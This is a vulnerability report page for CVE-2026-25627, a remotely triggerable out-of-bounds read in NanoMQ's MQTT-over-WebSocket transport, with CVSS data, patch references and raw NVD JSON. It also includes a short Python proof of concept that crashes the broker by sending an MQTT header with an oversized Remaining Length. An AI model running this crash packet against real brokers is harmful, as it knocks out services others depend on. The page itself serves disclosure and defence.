Security Vulnerability Report
中文
CVE-2026-25627 CVSS 6.5 MEDIUM

CVE-2026-25627

Published: 2026-03-30 21:17:08
Last Modified: 2026-04-02 15:33:55
Source: [email protected]

Description

NanoMQ MQTT Broker (NanoMQ) is an all-around Edge Messaging Platform. Prior to version 0.24.8, NanoMQ’s MQTT-over-WebSocket transport can be crashed by sending an MQTT packet with a deliberately large Remaining Length in the fixed header while providing a much shorter actual payload. The code path copies Remaining Length bytes without verifying that the current receive buffer contains that many bytes, resulting in an out-of-bounds read (ASAN reports OOB / crash). This is remotely triggerable over the WebSocket listener. This issue has been patched in version 0.24.8.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:emqx:nanomq:*:*:*:*:*:*:*:* - VULNERABLE
NanoMQ < 0.24.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import asyncio import websockets async def send_malicious_packet(uri): """ PoC for CVE-2026-25627 Sends a malicious MQTT packet with a large Remaining Length to NanoMQ. """ try: async with websockets.connect(uri) as websocket: # Construct a malicious MQTT packet # Byte 1: MQTT Packet Type (e.g., 0x10 for CONNECT) # Byte 2-5: Remaining Length encoded as a very large value (0xFF, 0xFF, 0xFF, 0x7F) # This indicates ~268MB of data, but we send very little payload. packet_type = b'\x10' # Variable Byte Integer for Remaining Length (Max value ~268 million) remaining_length = b'\xFF\xFF\xFF\x7F' # Minimal payload to trigger OOB read payload = b'' malicious_packet = packet_type + remaining_length + payload print(f"[+] Sending malicious packet to {uri}...") await websocket.send(malicious_packet) # Try to receive response (server likely crashes) response = await websocket.recv() print(f"[!] Received response (unexpected): {response}") except Exception as e: print(f"[!] Exception occurred (Crash expected): {e}") if __name__ == "__main__": # Target URI (default NanoMQ WebSocket port is usually 8083) target_uri = "ws://localhost:8083/mqtt" asyncio.get_event_loop().run_until_complete(send_malicious_packet(target_uri))

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-25627", "sourceIdentifier": "[email protected]", "published": "2026-03-30T21:17:07.750", "lastModified": "2026-04-02T15:33:55.340", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "NanoMQ MQTT Broker (NanoMQ) is an all-around Edge Messaging Platform. Prior to version 0.24.8, NanoMQ’s MQTT-over-WebSocket transport can be crashed by sending an MQTT packet with a deliberately large Remaining Length in the fixed header while providing a much shorter actual payload. The code path copies Remaining Length bytes without verifying that the current receive buffer contains that many bytes, resulting in an out-of-bounds read (ASAN reports OOB / crash). This is remotely triggerable over the WebSocket listener. This issue has been patched in version 0.24.8."}, {"lang": "es", "value": "NanoMQ MQTT Broker (NanoMQ) es una plataforma de mensajería de borde integral. Antes de la versión 0.24.8, el transporte MQTT-over-WebSocket de NanoMQ puede colapsar al enviar un paquete MQTT con una longitud restante (Remaining Length) deliberadamente grande en la cabecera fija mientras se proporciona una carga útil real mucho más corta. La ruta del código copia bytes de la longitud restante sin verificar que el búfer de recepción actual contenga esa cantidad de bytes, lo que resulta en una lectura fuera de límites (ASAN informa OOB / fallo). Esto puede ser activado remotamente a través del oyente de WebSocket. Este problema ha sido parcheado en la versión 0.24.8."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:emqx:nanomq:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.24.8", "matchCriteriaId": "5BCF33DD-E338-4F9C-BA28-CC3F585079AF"}]}]}], "references": [{"url": "https://github.com/nanomq/NanoNNG/commit/e80b30bad6d855593a68d18f2785bfaca6faf09e", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/nanomq/NanoNNG/pull/1405", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/nanomq/nanomq/releases/tag/0.24.8", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/nanomq/nanomq/security/advisories/GHSA-w4rh-v3h2-j29x", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/nanomq/nanomq/security/advisories/GHSA-w4rh-v3h2-j29x", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.